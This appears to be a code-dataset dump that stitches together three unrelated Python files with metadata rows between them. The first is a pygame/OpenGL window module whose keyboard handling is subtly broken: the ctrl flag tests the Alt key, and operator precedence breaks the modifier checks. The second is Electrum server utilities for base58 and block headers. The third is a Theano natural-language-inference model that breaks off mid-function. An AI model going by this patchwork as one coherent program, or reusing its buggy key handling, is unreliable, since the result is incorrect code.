# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
import datetime as dt
import OpenGL.GL as GL
import pygame as pg
import pygame.locals as co
from enum import Enum
from typing import Union, Optional
from contextlib import contextmanager
from easygl.structures import Vec4, Vec2
from .events import *
__all__ = [
'BlendMode',
'DisplayError',
'GLWindow',
'Multisamples',
'Projection',
]
class DisplayError(Exception):
pass
class Multisamples(Enum):
none = 0
double = 1
triple = 2
quad = 3
class BlendMode(Enum):
none = 0
add = 1
alpha = 2
multiply = 3
class Projection(Enum):
custom = 0
ortho_up = 1
ortho_down = 2
class GLWindow(object):
_current = None # type: GLWindow
def __init__(self, width, height, title, multisamples, blendmode, projection, **kwargs):
# type: (int, int, str, Multisamples, BlendMode, Projection) -> None
if self.__class__._current is not None:
raise DisplayError("Display already initialized. Call reset() method to change settings.")
color = kwargs.get('clear_color', (0., 0., 0., 1.))
size = width, height
flags = co.OPENGL
flags |= co.RESIZABLE if kwargs.get('resizable', False) else 0
flags |= co.DOUBLEBUF if kwargs.get('doublebuf', False) else 0
flags |= co.FULLSCREEN if kwargs.get('fullscreen', False) else 0
flags |= co.HWSURFACE if kwargs.get('hwsurface', False) else 0
pg.init()
if multisamples is not Multisamples.none:
samples = {
Multisamples.double: 2,
Multisamples.triple: 3,
Multisamples.quad: 4
}.get(multisamples, 2)
pg.display.gl_set_attribute(pg.GL_MULTISAMPLESAMPLES, samples)
surface = pg.display.set_mode(size, flags)
# print(surface)
width, height = surface.get_size()
pg.display.set_caption(title, title)
if multisamples is not Multisamples.none:
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_BLEND)
GL.glClearColor(*color)
GL.glViewport(0, 0, width, height)
self._handling_input = False
self._rendering = False
self._close_request = False
self._blend_mode = None
self.blend_mode = blendmode
self._projection = projection
self._flip_time = 0
self._input_time = 0
self._render_time = 0
self._delta = 1
@property
def projection(self):
return self._projection
@property
def title(self):
return pg.display.get_caption()
@title.setter
def title(self, value):
pg.display.set_caption(repr(value), repr(value))
@property
def should_close(self):
# type: () -> bool
return self._close_request
@property
def resolution(self):
# type: () -> tuple
return pg.display.get_surface().get_size()
@property
def width(self):
# type: () -> int
return pg.display.get_surface().get_width()
@property
def height(self):
# type: () -> int
return pg.display.get_surface().get_height()
@property
def blend_mode(self):
# type: () -> BlendMode
return self._blend_mode
@blend_mode.setter
def blend_mode(self, value):
# type: (BlendMode) -> None
if value is not self._blend_mode:
self._blend_mode = value
if value is BlendMode.none:
GL.glBlendFunc(GL.GL_ONE, GL.GL_ZERO)
elif value is BlendMode.add:
try:
GL.glBlendFuncSeparate(GL.GL_SRC_ALPHA, GL.GL_ONE, GL.GL_ONE, GL.GL_ONE)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE)
elif value is BlendMode.alpha:
try:
GL.glBlendFuncSeparate(
GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA, GL.GL_ONE, GL.GL_ONE_MINUS_SRC_ALPHA)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
elif value is BlendMode.multiply:
try:
GL.glBlendFuncSeparate(GL.GL_ALPHA, GL.GL_ONE, GL.GL_ONE, GL.GL_ONE)
except (NameError, Exception):
GL.glBlendFunc(GL.GL_DST_COLOR, GL.GL_ZERO)
@property
def mouse_pos(self):
# type: () -> Vec2
x, y = pg.mouse.get_pos()
if self._projection is Projection.ortho_up:
y = pg.display.get_surface().get_height() - y
return Vec2(x, y)
@property
def mouse_motion(self):
# type: () -> Vec2
x, y = pg.mouse.get_rel()
if self._projection is Projection.ortho_up:
y = -y
return Vec2(x, y)
@property
def frame_delta(self):
# type: () -> int
return self._delta
@contextmanager
def input(self, raw=False):
# type: () -> None
if self._handling_input:
raise RuntimeError("Can't nest input processing contexts.")
self._handling_input = True
time = pg.time.get_ticks()
delta = time - self._input_time
self._input_time = time
if raw:
yield delta, pg.event.get(), pg.key.get_pressed(), Vec2(*pg.mouse.get_pos()), Vec2(*pg.mouse.get_rel())
else:
events = []
for event in pg.event.get():
if event.type == co.ACTIVEEVENT:
events.append(Focus(event.gain, event.state, pg.time.get_ticks()))
elif event.type == co.QUIT:
now = dt.datetime.now()
ms = pg.time.get_ticks()
self._close_request = True
events.append(CloseWindow(ms, now))
elif event.type == co.KEYDOWN:
ctrl = event.mod & co.KMOD_ALT != 0
shift = event.mod & co.KMOD_SHIFT != 0
alt = event.mod & co.KMOD_ALT != 0
events.append(KeyDown(event.key, event.unicode, event.mod, ctrl, shift, alt))
elif event.type == co.KEYUP:
ctrl = event.mod & co.KMOD_ALT != 0
shift = event.mod & co.KMOD_SHIFT != 0
alt = event.mod & co.KMOD_ALT != 0
events.append(KeyUp(event.key, event.mod, ctrl, shift, alt))
elif event.type == co.MOUSEMOTION:
height = pg.display.get_surface().get_height()
x, y = event.pos
mx, my = event.rel
if self._projection is Projection.ortho_up:
y = height - y
my = -my
lbutton, mbutton, rbutton = event.buttons
events.append(MouseMotion(Vec2(x, y), Vec2(mx, my), lbutton, mbutton, rbutton))
elif event.type == co.MOUSEBUTTONDOWN:
height = pg.display.get_surface().get_height()
x, y = event.pos
if self._projection is Projection.ortho_up:
y = height - y
if event.button == 1:
events.append(LeftButtonDown(Vec2(x, y), x, y))
elif event.button == 2:
events.append(MiddleButtonDown(Vec2(x, y), x, y))
elif event.button == 3:
events.append(RightButtonDown(Vec2(x, y), x, y))
elif event.button == 4:
events.append(MouseWheelUp(Vec2(x, y), x, y))
else:
events.append(MouseWheelDown(Vec2(x, y), x, y))
elif event.type == co.MOUSEBUTTONUP:
height = pg.display.get_surface().get_height()
x, y = event.pos
if self._projection is Projection.ortho_up:
y = height - y
if event.button == 1:
events.append(LeftButtonUp(Vec2(x, y), x, y))
elif event.button == 2:
events.append(MiddleButtonUp(Vec2(x, y), x, y))
else:
events.append(RightButtonUp(Vec2(x, y), x, y))
elif event.type == co.VIDEORESIZE:
events.append(VideoResize(event.w, event.h, event.size))
elif event.type == co.VIDEOEXPOSE:
now = dt.datetime.now()
ms = pg.time.get_ticks()
events.append(VideoExpose(ms, now))
elif event.type == co.JOYAXISMOTION:
events.append(JoyAxis(event.joy, event.axis, event.value))
elif event.type == co.JOYBALLMOTION:
events.append(JoyBall(event.joy, event.ball, event.rel))
elif event.type == co.JOYHATMOTION:
events.append(JoyHat(event.joy, event.hat, event.value))
elif event.type == co.JOYBUTTONDOWN:
events.append(JoyButtonDown(event.joy, event.button))
elif event.type == co.JOYBUTTONUP:
events.append(JoyButtonUp(event.joy, event.button))
keys = pg.key.get_pressed()
mouse_pos = Vec2(*pg.mouse.get_pos())
mouse_rel = Vec2(*pg.mouse.get_rel())
if self._projection is Projection.ortho_up:
mouse_pos.y = self.height - mouse_pos.y
mouse_rel.y = -mouse_rel.y
yield delta, events, keys, mouse_pos, mouse_rel
self._handling_input = False
@contextmanager
def rendering(self, clear_color=None):
# type: (Optional[Union[Vec4, tuple, list]]) -> None
if self._rendering:
raise RuntimeError("Can't nest GLWindow rendering contexts.")
self._rendering = True
time = pg.time.get_ticks()
delta = time - self._render_time
self._render_time = time
yield delta
pg.display.flip()
time = pg.time.get_ticks()
self._delta = time - self._flip_time
self._flip_time = time
if clear_color is not None:
GL.glClearColor(*clear_color)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
self._rendering = False
def close(self):
# type: () -> None
self._close_request = True
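# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original module).
# A typical main loop polls input and renders inside the two context managers:
#
#     window = GLWindow(640, 480, "demo", Multisamples.none, BlendMode.alpha,
#                       Projection.ortho_up, doublebuf=True)
#     while not window.should_close:
#         with window.input() as (delta, events, keys, mouse_pos, mouse_rel):
#             pass  # react to KeyDown / MouseMotion / CloseWindow events here
#         with window.rendering(clear_color=(0., 0., 0., 1.)) as delta:
#             pass  # issue OpenGL draw calls here; the buffer flips on exit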
| mit | 6,686,868,297,029,935,000 | 34.364179 | 115 | 0.543682 | false | 3.857701 | false | false | false |
testalt/electrum-ppc-server | src/utils.py | 1 | 6099 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from itertools import imap
import threading
import time
import hashlib
import sys
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
global PUBKEY_ADDRESS
global SCRIPT_ADDRESS
PUBKEY_ADDRESS = 138
SCRIPT_ADDRESS = 5
def rev_hex(s):
return s.decode('hex')[::-1].encode('hex')
def int_to_hex(i, length=1):
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
if i < 0xfd:
return int_to_hex(i)
elif i <= 0xffff:
return "fd" + int_to_hex(i, 2)
elif i <= 0xffffffff:
return "fe" + int_to_hex(i, 4)
else:
return "ff" + int_to_hex(i, 8)
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
def header_to_string(res):
pbh = res.get('prev_block_hash')
if pbh is None:
pbh = '0'*64
return int_to_hex(res.get('version'), 4) \
+ rev_hex(pbh) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
def hex_to_int(s):
return int('0x' + s[::-1].encode('hex'), 16)
def header_from_string(s):
return {
'version': hex_to_int(s[0:4]),
'prev_block_hash': hash_encode(s[4:36]),
'merkle_root': hash_encode(s[36:68]),
'timestamp': hex_to_int(s[68:72]),
'bits': hex_to_int(s[72:76]),
'nonce': hex_to_int(s[76:80]),
}
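# (Added note) header_to_string / header_from_string pack and unpack the standard
# 80-byte block header: 4-byte version, 32-byte previous block hash, 32-byte
# merkle root, 4-byte timestamp, 4-byte bits and 4-byte nonce, with the hash
# fields stored in reversed (little-endian) byte order.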
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(hashlib.sha256(public_key).digest())
return md.digest()
except:
import ripemd
md = ripemd.new(hashlib.sha256(public_key).digest())
return md.digest()
def public_key_to_pubkey_address(public_key):
return hash_160_to_pubkey_address(hash_160(public_key))
def public_key_to_bc_address(public_key):
""" deprecated """
return public_key_to_pubkey_address(public_key)
def hash_160_to_pubkey_address(h160, addrtype=None):
    """ addrtype defaults to PUBKEY_ADDRESS """
    if not addrtype:
        addrtype = PUBKEY_ADDRESS
    return hash_160_to_address(h160, addrtype)
def hash_160_to_script_address(h160):
return hash_160_to_address(h160, SCRIPT_ADDRESS)
def hash_160_to_address(h160, addrtype = 0):
""" Checks if the provided hash is actually 160bits or 20 bytes long and returns the address, else None
"""
    if h160 is None or len(h160) != 20:
return None
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
    if addr is None or len(addr) == 0:
return None
bytes = b58decode(addr, 25)
return bytes[1:21] if bytes is not None else None
def b58encode(v):
"""encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0':
nPad += 1
else:
break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
else:
break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
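# (Added note) EncodeBase58Check appends the first 4 bytes of the double-SHA256
# of the payload as a checksum, so DecodeBase58Check(EncodeBase58Check(s)) == s
# for any byte string s, while DecodeBase58Check returns None on a bad checksum.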
########### end pywallet functions #######################
def random_string(length):
with open("/dev/urandom", 'rb') as f:
return b58encode( f.read(length) )
def timestr():
return time.strftime("[%d/%m/%Y-%H:%M:%S]")
### logger
import logging
import logging.handlers
logger = logging.getLogger('electrum-ppc')
def init_logger(logfile):
hdlr = logging.handlers.WatchedFileHandler(logfile)
formatter = logging.Formatter('%(asctime)s %(message)s', "[%d/%m/%Y-%H:%M:%S]")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
def print_log(*args):
logger.info(" ".join(imap(str, args)))
def print_warning(message):
logger.warning(message)
| agpl-3.0 | -1,488,351,987,294,061,300 | 23.396 | 107 | 0.610756 | false | 3.181534 | false | false | false |
BladeSun/NliWithKnowledge | session2/dam_bk_1.py | 1 | 59183 | '''
Build a neural machine translation model with soft attention
'''
import theano
import theano.tensor as tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
import cPickle as pkl
import ipdb
import numpy
import copy
import os
import warnings
import sys
import time
import logging
from collections import OrderedDict
from data_iterator_bk import TextIterator
profile = False
# push parameters to Theano shared variables
def zipp(params, tparams):
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
# pull parameters from Theano shared variables
def unzip(zipped):
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
# get the list of parameters: Note that tparams must be OrderedDict
def itemlist(tparams):
return [vv for kk, vv in tparams.iteritems()]
# dropout
def dropout_layer(state_before, use_noise, trng):
proj = tensor.switch(
use_noise,
state_before * trng.binomial(state_before.shape, p=0.5, n=1,
dtype=state_before.dtype),
state_before * 0.5)
return proj
# make prefix-appended name
def _p(pp, name):
return '%s_%s' % (pp, name)
# initialize Theano shared variables according to the initial parameters
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
tparams[kk] = theano.shared(params[kk], name=kk)
return tparams
# load parameters
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
warnings.warn('%s is not in the archive' % kk)
continue
params[kk] = pp[kk]
return params
# layers: 'name': ('parameter initializer', 'feedforward')
layers = {'ff': ('param_init_fflayer', 'fflayer'),
'gru': ('param_init_gru', 'gru_layer'),
'gru_cond': ('param_init_gru_cond', 'gru_cond_layer'),
'funcf_layer': ('param_init_funcf_layer', 'funcf_layer'),
}
def get_layer(name):
fns = layers[name]
return (eval(fns[0]), eval(fns[1]))
# some utilities
def ortho_weight(ndim):
W = numpy.random.randn(ndim, ndim)
u, s, v = numpy.linalg.svd(W)
return u.astype('float32')
def norm_weight(nin, nout=None, scale=0.01, ortho=True):
if nout is None:
nout = nin
if nout == nin and ortho:
W = ortho_weight(nin)
else:
W = scale * numpy.random.randn(nin, nout)
return W.astype('float32')
def relu(x):
return tensor.nnet.relu(x)
def tanh(x):
return tensor.tanh(x)
def linear(x):
return x
def concatenate(tensor_list, axis=0):
"""
Alternative implementation of `theano.tensor.concatenate`.
This function does exactly the same thing, but contrary to Theano's own
implementation, the gradient is implemented on the GPU.
Backpropagating through `theano.tensor.concatenate` yields slowdowns
because the inverse operation (splitting) needs to be done on the CPU.
This implementation does not have that problem.
:usage:
>>> x, y = theano.tensor.matrices('x', 'y')
>>> c = concatenate([x, y], axis=1)
:parameters:
- tensor_list : list
list of Theano tensor expressions that should be concatenated.
- axis : int
the tensors will be joined along this axis.
:returns:
- out : tensor
the concatenated tensor expression.
"""
concat_size = sum(tt.shape[axis] for tt in tensor_list)
output_shape = ()
for k in range(axis):
output_shape += (tensor_list[0].shape[k],)
output_shape += (concat_size,)
for k in range(axis + 1, tensor_list[0].ndim):
output_shape += (tensor_list[0].shape[k],)
out = tensor.zeros(output_shape)
offset = 0
for tt in tensor_list:
indices = ()
for k in range(axis):
indices += (slice(None),)
indices += (slice(offset, offset + tt.shape[axis]),)
for k in range(axis + 1, tensor_list[0].ndim):
indices += (slice(None),)
out = tensor.set_subtensor(out[indices], tt)
offset += tt.shape[axis]
return out
# batch preparation
def prepare_data(seqs_x, seqs_x_syn, seqs_y, seqs_y_syn, label, maxlen=None, n_words_src=30000,
n_words=30000, bk_for_x=None, bk_for_y=None, bk_dim=10):
# x: a list of sentences
lengths_x = [len(s) for s in seqs_x]
lengths_y = [len(s) for s in seqs_y]
if maxlen is not None:
new_seqs_x = []
new_seqs_x_syn = []
new_seqs_y = []
new_seqs_y_syn = []
new_lengths_x = []
new_lengths_y = []
new_label = []
for l_x, s_x, s_x_syn, l_y, s_y, s_y_syn, ll in zip(lengths_x, seqs_x, seqs_x_syn, lengths_y, seqs_y, seqs_y_syn, label):
if l_x < maxlen and l_y < maxlen:
new_seqs_x.append(s_x)
new_seqs_x_syn.append(s_x_syn)
new_lengths_x.append(l_x)
new_seqs_y.append(s_y)
new_seqs_y_syn.append(s_y_syn)
new_lengths_y.append(l_y)
new_label.append(ll)
lengths_x = new_lengths_x
seqs_x = new_seqs_x
seqs_x_syn = new_seqs_x_syn
lengths_y = new_lengths_y
seqs_y = new_seqs_y
seqs_y_syn = new_seqs_y_syn
label = new_label
if len(lengths_x) < 1 or len(lengths_y) < 1:
return None, None, None, None, None, None, None
n_samples = len(seqs_x)
maxlen_x = numpy.max(lengths_x) + 2
maxlen_y = numpy.max(lengths_y) + 2
x = numpy.zeros((maxlen_x, n_samples)).astype('int64')
x_syn = numpy.zeros((maxlen_x, n_samples)).astype('int64')
y = numpy.zeros((maxlen_y, n_samples)).astype('int64')
y_syn = numpy.zeros((maxlen_y, n_samples)).astype('int64')
flabel = numpy.array(label).astype('int64')
x_mask = numpy.zeros((maxlen_x, n_samples)).astype('float32')
y_mask = numpy.zeros((maxlen_y, n_samples)).astype('float32')
for idx, [s_x, s_x_syn, s_y, s_y_syn] in enumerate(zip(seqs_x, seqs_x_syn, seqs_y, seqs_y_syn)):
x[0, idx] = 1
x[lengths_x[idx]+1, idx] = 2
x[1:lengths_x[idx] + 1, idx] = s_x
x_mask[:lengths_x[idx] + 2, idx] = 1.
x_syn[0, idx] = 3 # 3 for none
x_syn[lengths_x[idx]+1, idx] = 3
x_syn[1:lengths_x[idx] + 1, idx] = s_x_syn
y[0, idx] = 1
y[lengths_y[idx]+1, idx] = 2
y[1:lengths_y[idx] + 1, idx] = s_y
y_mask[:lengths_y[idx] + 2, idx] = 1.
y_syn[0, idx] = 3 # 3 for none
y_syn[lengths_y[idx]+1, idx] = 3
y_syn[1:lengths_y[idx] + 1, idx] = s_y_syn
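    # (Added comment) getbk looks up, for one source token id `sid` in batch
    # column `batch_id`, the bk_dim-dimensional knowledge vector against every
    # token of the other sentence, defaulting to zeros when no entry exists.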
getbk = lambda sid, batch_id, target, bkdict: numpy.array([numpy.array(bkdict[sid][tid]).astype('float32') if tid in bkdict[sid] else numpy.zeros(bk_dim).astype('float32') for tid in target[:, batch_id]])
bk_x = numpy.array([getbk(z[0], z[1], y_syn, bk_for_x) if z[0] in bk_for_x else numpy.zeros((maxlen_y,bk_dim)).astype('float32') for z in zip(x_syn.reshape(-1).tolist(), range(n_samples) * maxlen_x) ]).reshape(maxlen_x, n_samples, maxlen_y, bk_dim)
bk_y = numpy.array([getbk(z[0], z[1], x_syn, bk_for_y) if z[0] in bk_for_y else numpy.zeros((maxlen_x,bk_dim)).astype('float32') for z in zip(y_syn.reshape(-1).tolist(), range(n_samples) * maxlen_y) ]).reshape(maxlen_y, n_samples, maxlen_x, bk_dim)
bk_x = bk_x[:,:,:,(0,11,12)]
return x, x_mask, bk_x, y, y_mask, bk_y, flabel
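# (Added note) prepare_data returns, per batch: int64 index matrices x and y of
# shape (maxlen_x, n_samples) and (maxlen_y, n_samples), float32 masks of the
# same shapes, bk_x of shape (maxlen_x, n_samples, maxlen_y, 3) after the column
# selection above, bk_y of shape (maxlen_y, n_samples, maxlen_x, bk_dim), and
# the int64 label vector of length n_samples.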
# feedforward layer: affine transformation + point-wise nonlinearity
def param_init_fflayer(options, params, prefix='ff', nin=None, nout=None,
ortho=True):
if nin is None:
nin = options['dim_proj']
if nout is None:
nout = options['dim_proj']
params[_p(prefix, 'W')] = norm_weight(nin, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b')] = numpy.zeros((nout,)).astype('float32')
return params
def fflayer(tparams, state_below, options, prefix='rconv',
activ='lambda x: tensor.tanh(x)', **kwargs):
return eval(activ)(
tensor.dot(state_below, tparams[_p(prefix, 'W')]) +
tparams[_p(prefix, 'b')])
# functionF layer
def param_init_funcf_layer(options, params, prefix='funcF', nin=None, nout=None,
ortho=True):
if nin is None:
nin = options['dim_word']
if nout is None:
nout = options['dim_proj']
params[_p(prefix, 'W1')] = norm_weight(nin, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b1')] = numpy.zeros((nout,)).astype('float32')
params[_p(prefix, 'W2')] = norm_weight(nout, nout, scale=0.01, ortho=ortho)
params[_p(prefix, 'b2')] = numpy.zeros((nout,)).astype('float32')
return params
def funcf_layer(tparams, state_below, options, prefix='funcF',
activ='lambda x: tensor.tanh(x)', **kwargs):
emb_proj = (tensor.dot(state_below, tparams[_p(prefix, 'W1')]) +
tparams[_p(prefix, 'b1')])
return eval(activ)(
tensor.dot(emb_proj, tparams[_p(prefix, 'W2')]) +
tparams[_p(prefix, 'b2')])
# GRU layer
def param_init_gru(options, params, prefix='gru', nin=None, dim=None):
if nin is None:
nin = options['dim_proj']
if dim is None:
dim = options['dim_proj']
# embedding to gates transformation weights, biases
W = numpy.concatenate([norm_weight(nin, dim),
norm_weight(nin, dim)], axis=1)
params[_p(prefix, 'W')] = W
params[_p(prefix, 'b')] = numpy.zeros((2 * dim,)).astype('float32')
# recurrent transformation weights for gates
U = numpy.concatenate([ortho_weight(dim),
ortho_weight(dim)], axis=1)
params[_p(prefix, 'U')] = U
# embedding to hidden state proposal weights, biases
Wx = norm_weight(nin, dim)
params[_p(prefix, 'Wx')] = Wx
params[_p(prefix, 'bx')] = numpy.zeros((dim,)).astype('float32')
# recurrent transformation weights for hidden state proposal
Ux = ortho_weight(dim)
params[_p(prefix, 'Ux')] = Ux
return params
def gru_layer(tparams, state_below, options, prefix='gru', mask=None,
**kwargs):
nsteps = state_below.shape[0]
if state_below.ndim == 3:
n_samples = state_below.shape[1]
else:
n_samples = 1
dim = tparams[_p(prefix, 'Ux')].shape[1]
if mask is None:
mask = tensor.alloc(1., state_below.shape[0], 1)
# utility function to slice a tensor
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
return _x[:, n * dim:(n + 1) * dim]
# state_below is the input word embeddings
# input to the gates, concatenated
state_below_ = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + \
tparams[_p(prefix, 'b')]
# input to compute the hidden state proposal
state_belowx = tensor.dot(state_below, tparams[_p(prefix, 'Wx')]) + \
tparams[_p(prefix, 'bx')]
# step function to be used by scan
# arguments | sequences |outputs-info| non-seqs
def _step_slice(m_, x_, xx_, h_, U, Ux):
preact = tensor.dot(h_, U)
preact += x_
# reset and update gates
r = tensor.nnet.sigmoid(_slice(preact, 0, dim))
u = tensor.nnet.sigmoid(_slice(preact, 1, dim))
# compute the hidden state proposal
preactx = tensor.dot(h_, Ux)
preactx = preactx * r
preactx = preactx + xx_
# hidden state proposal
h = tensor.tanh(preactx)
# leaky integrate and obtain next hidden state
h = u * h_ + (1. - u) * h
h = m_[:, None] * h + (1. - m_)[:, None] * h_
return h
# prepare scan arguments
seqs = [mask, state_below_, state_belowx]
init_states = [tensor.alloc(0., n_samples, dim)]
_step = _step_slice
shared_vars = [tparams[_p(prefix, 'U')],
tparams[_p(prefix, 'Ux')]]
rval, updates = theano.scan(_step,
sequences=seqs,
outputs_info=init_states,
non_sequences=shared_vars,
name=_p(prefix, '_layers'),
n_steps=nsteps,
profile=profile,
strict=True)
rval = [rval]
return rval
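# Usage sketch (mirrors the encoder in build_model below): given word embeddings
# emb of shape (n_timesteps, n_samples, dim_word),
#   params = param_init_gru(options, params, prefix='encoder',
#                           nin=options['dim_word'], dim=options['dim'])
#   proj = gru_layer(tparams, emb, options, prefix='encoder', mask=x_mask)
#   hidden = proj[0]   # (n_timesteps, n_samples, dim)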
# Conditional GRU layer with Attention
def param_init_gru_cond(options, params, prefix='gru_cond',
nin=None, dim=None, dimctx=None,
nin_nonlin=None, dim_nonlin=None):
if nin is None:
nin = options['dim']
if dim is None:
dim = options['dim']
if dimctx is None:
dimctx = options['dim']
if nin_nonlin is None:
nin_nonlin = nin
if dim_nonlin is None:
dim_nonlin = dim
W = numpy.concatenate([norm_weight(nin, dim),
norm_weight(nin, dim)], axis=1)
params[_p(prefix, 'W')] = W
params[_p(prefix, 'b')] = numpy.zeros((2 * dim,)).astype('float32')
U = numpy.concatenate([ortho_weight(dim_nonlin),
ortho_weight(dim_nonlin)], axis=1)
params[_p(prefix, 'U')] = U
Wx = norm_weight(nin_nonlin, dim_nonlin)
params[_p(prefix, 'Wx')] = Wx
Ux = ortho_weight(dim_nonlin)
params[_p(prefix, 'Ux')] = Ux
params[_p(prefix, 'bx')] = numpy.zeros((dim_nonlin,)).astype('float32')
U_nl = numpy.concatenate([ortho_weight(dim_nonlin),
ortho_weight(dim_nonlin)], axis=1)
params[_p(prefix, 'U_nl')] = U_nl
params[_p(prefix, 'b_nl')] = numpy.zeros((2 * dim_nonlin,)).astype('float32')
Ux_nl = ortho_weight(dim_nonlin)
params[_p(prefix, 'Ux_nl')] = Ux_nl
params[_p(prefix, 'bx_nl')] = numpy.zeros((dim_nonlin,)).astype('float32')
# context to LSTM
Wc = norm_weight(dimctx, dim * 2)
params[_p(prefix, 'Wc')] = Wc
Wcx = norm_weight(dimctx, dim)
params[_p(prefix, 'Wcx')] = Wcx
# attention: combined -> hidden
W_comb_att = norm_weight(dim, dimctx)
params[_p(prefix, 'W_comb_att')] = W_comb_att
# attention: context -> hidden
Wc_att = norm_weight(dimctx)
params[_p(prefix, 'Wc_att')] = Wc_att
# attention: hidden bias
b_att = numpy.zeros((dimctx,)).astype('float32')
params[_p(prefix, 'b_att')] = b_att
    # attention: projection to a scalar alignment score
U_att = norm_weight(dimctx, 1)
params[_p(prefix, 'U_att')] = U_att
c_att = numpy.zeros((1,)).astype('float32')
params[_p(prefix, 'c_tt')] = c_att
return params
def gru_cond_layer(tparams, state_below, options, prefix='gru',
mask=None, context=None, one_step=False,
init_memory=None, init_state=None,
context_mask=None,
**kwargs):
    assert context is not None, 'Context must be provided'
    if one_step:
        assert init_state is not None, 'previous state must be provided'
nsteps = state_below.shape[0]
if state_below.ndim == 3:
n_samples = state_below.shape[1]
else:
n_samples = 1
# mask
if mask is None:
mask = tensor.alloc(1., state_below.shape[0], 1)
dim = tparams[_p(prefix, 'Wcx')].shape[1]
# initial/previous state
if init_state is None:
init_state = tensor.alloc(0., n_samples, dim)
# projected context
assert context.ndim == 3, \
'Context must be 3-d: #annotation x #sample x dim'
pctx_ = tensor.dot(context, tparams[_p(prefix, 'Wc_att')]) + \
tparams[_p(prefix, 'b_att')]
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
return _x[:, n * dim:(n + 1) * dim]
# projected x
state_belowx = tensor.dot(state_below, tparams[_p(prefix, 'Wx')]) + \
tparams[_p(prefix, 'bx')]
state_below_ = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + \
tparams[_p(prefix, 'b')]
def _step_slice(m_, x_, xx_, h_, ctx_, alpha_, pctx_, cc_,
U, Wc, W_comb_att, U_att, c_tt, Ux, Wcx,
U_nl, Ux_nl, b_nl, bx_nl):
preact1 = tensor.dot(h_, U)
preact1 += x_
preact1 = tensor.nnet.sigmoid(preact1)
r1 = _slice(preact1, 0, dim)
u1 = _slice(preact1, 1, dim)
preactx1 = tensor.dot(h_, Ux)
preactx1 *= r1
preactx1 += xx_
h1 = tensor.tanh(preactx1)
h1 = u1 * h_ + (1. - u1) * h1
h1 = m_[:, None] * h1 + (1. - m_)[:, None] * h_
# attention
